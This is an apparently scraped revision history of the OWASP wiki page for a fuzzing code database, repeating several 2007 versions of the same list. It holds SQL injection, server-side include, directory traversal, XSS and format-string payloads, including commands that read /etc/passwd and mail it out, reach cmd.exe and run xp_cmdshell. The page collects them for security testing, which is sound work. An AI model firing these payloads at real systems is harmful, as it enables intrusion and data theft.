0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
</pre><br />
<br />
=== SSI (Server Side Includes) Statements ===<br />
<br />
<pre><br />
<!--#exec cmd="/bin/ls /" --><br/><br />
<!--#exec cmd="cat /etc/passwd" --><br/><br />
<!--#exec cmd="find / -name *.* -print" --><br/><br />
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/><br />
</pre><br />
<br />
=== Directory Traversal Statements ===<br />
<br />
<pre><br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
</pre><br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".''<br />
<br />
=== XSS Statements ===<br />
<br />
<pre><br />
<a href="javas&#99;ript&#35;[code]"><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"><br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"> [Mozilla]<br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> <br />
</pre><br />
<br />
=== Format String Statements ===<br />
<br />
<pre><br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;<br />
</pre></div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=20478
Category:OWASP Fuzzing Code Database
2007-07-30T13:57:19Z
<p>Foobar23: </p>
<hr />
<div>This database is a collection of statements used in code injection software. All too often, security professionals rely on their own repositories of statements, collected from several projects over a long time. We want to collect and combine all these statements, merging the databases of several projects such as [[WebScarab]] and [[JBroFuzz]], to build a large dataset of effective statements that provides better testing results.<br />
Please add your own statements and check the statements already added. <br />
<br />
=== SQL Injection Statements ===<br />
<br />
<pre><br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
a" or 1=1--<br />
" or "a" = "a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
declare @q nvarchar (4000) select @q =<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
</pre><br />
<br />
=== SSI (Server Side Includes) Statements ===<br />
<br />
<pre><br />
<!--#exec cmd="/bin/ls /" --><br/><br />
<!--#exec cmd="cat /etc/passwd" --><br/><br />
<!--#exec cmd="find / -name *.* -print" --><br/><br />
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/><br />
</pre><br />
<br />
=== Directory Traversal Statements ===<br />
<br />
<pre><br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
</pre><br />
<br />
=== XSS Statements ===<br />
<br />
<pre><br />
<a href="javas&#99;ript&#35;[code]"><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"><br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"> [Mozilla]<br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> <br />
</pre><br />
<br />
=== Format String Statements ===<br />
<br />
<pre><br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;<br />
</pre></div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=20476
Category:OWASP Fuzzing Code Database
2007-07-30T13:53:01Z
<p>Foobar23: Added Format Strings</p>
<hr />
<div>This database is a collection of statements used in code injection software. All too often, security professionals rely on their own repositories of statements, collected from several projects over a long time. We want to collect and combine all these statements, merging the databases of several projects such as [[WebScarab]] and [[JBroFuzz]], to build a large dataset of effective statements that provides better testing results.<br />
Please add your own statements and check the statements already added. <br />
<br />
=== SQL Injection Statements ===<br />
<br />
<pre><br />
<br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
a" or 1=1--<br />
a" or "a" = "a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
declare @q nvarchar (4000) select @q =<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
<br />
</pre><br />
<br />
=== SSI (Server Side Includes) Statements ===<br />
<br />
<pre><br />
<br />
<!--#exec cmd="/bin/ls /" --><br/><br />
<!--#exec cmd="cat /etc/passwd" --><br/><br />
<!--#exec cmd="find / -name *.* -print" --><br/><br />
